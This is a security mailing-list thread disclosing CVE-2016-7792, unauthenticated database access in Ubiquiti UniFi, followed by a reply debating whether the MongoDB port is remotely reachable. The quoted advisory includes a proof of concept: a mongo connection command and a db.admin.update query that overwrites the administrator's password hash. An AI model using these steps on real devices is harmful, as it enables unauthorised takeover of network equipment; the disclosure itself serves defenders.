Re: Critical Vulnerability in Ubiquiti UniFi

[Tim Schughart <t.schughart () prosec-networks com>]

Hi Carlos, 

you are correct that mongo is bound to 127.0.0.1 only. But you are able to get it remote if you are using the Unify 
Controller Software. 

So the db gets tunneled to your device. 

Test environment: 
1. I have configured the AP to our network. 
2. I have removed every piece of software for configuring the ap. 
3. I have installed the Unify Manager (for Mac 5.2.7.)
4. I’m able to connect to the database via 127.0.0.1 

Network topology: 
The access point is cabled to a AVM FritzBox. Our test client is connected via W-Lan provided by FritzBox - so there is 
no direct connection to the ap.  


Best regards
Tim Schughart
 
> Am 01.10.2016 um 15:30 schrieb Carlos Silva <r3pek () r3pek org>:
>
> Hi Tim!
>
> I can be missing something here but I just checked this on a fresh installed Unifi Controller and mongod is binding 
> to localhost making this a non-issue. Or, you have to get a remote shell first before you can get a connection to the 
> DB. Am I missing something?
>
> Thanks,
> Carlos Silva
>
> On Fri, Sep 30, 2016 at 10:49 AM, Tim Schughart <t.schughart () prosec-networks com> wrote:
> Hello @all,
>
> together with my colleague we found two uncritical vulnerabilities you'll find below.
>
> Product: UniFi AP AC Lite
> Vendor: Ubiquiti Networks Inc.
>
> Internal reference: ? (Bug ID)
> Vulnerability type: Incorrect access control
> Vulnerable version: Unify 5.2.7 and possible other versions affected (not tested)
> Vulnerable component: Database
> Report confidence: yes
> Solution status: Not fixed by Vendor, the bug is a feature.
> Fixed versions: -
> Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec Networks
> Solution date: -
> Public disclosure: 2016-09-30
> CVE reference: CVE-2016-7792
> CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
>
>
> Vulnerability Details:
> You are able to connect to the access points database, because of an broken authentication (OWASP TOP10). So you are 
> able to modify the database and read the data. An possible scenario you'll find in PoC section.
>
> Risk:
> An attacker gets access to the database and for e.g. is able to change the admins password, like you see in PoC below.
>
> PoC:
>  1. Generate SHA512 Hash with e.g.
>  mkpasswd -m sha-512
>
>  2. Connect via network to database, e.g. :
>  mongo --port 27117 --host target_ip
>
>  3. Change password via command
>  "db.admin.update({"name":"ProSec"}, {$set : {"x_shadow":
>  "$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})"
>  4. Login via web interface with new password
>
>
> Best regards / Mit freundlichen Grüßen
>
>
> Tim Schughart
> CEO / Geschäftsführer
>
> --
> ProSec Networks e.K.
> Ellingshohl 82
> 56077 Koblenz
>
> Website: https://www.prosec-networks.com
> E-Mail: t.schughart () prosec networks com
> Mobile: +49 (0)157 7901 5826
> Phone: +49 (0)261 450 930 90
>
> "This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY PROTECTED information and is intended 
> only for the named recipient(s). Any unauthorized use, dissemination, copying or forwarding is strictly prohibited. 
> If you are not the intended recipient and have received this email communication in error, please notify the sender 
> immediately, delete it and destroy all copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz, HRA 21625.“
>
> "Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE und/oder RECHTLICH GESCHÜTZTE 
> Informationen enthalten und ist ausschließlich für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, 
> Weitergabe, Vervielfältigung oder Versendung ist strengstens verboten. Sollten Sie nicht der angegebene Adressat sein 
> und diese E-Mail Mitteilung irrtümlich erhalten haben, informieren Sie bitte sofort den Absender, löschen diese 
> E-Mail und vernichten alle Kopien. USt-IdNr.:  DE290654714, Amtsgericht Koblenz, HRA 21625."
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/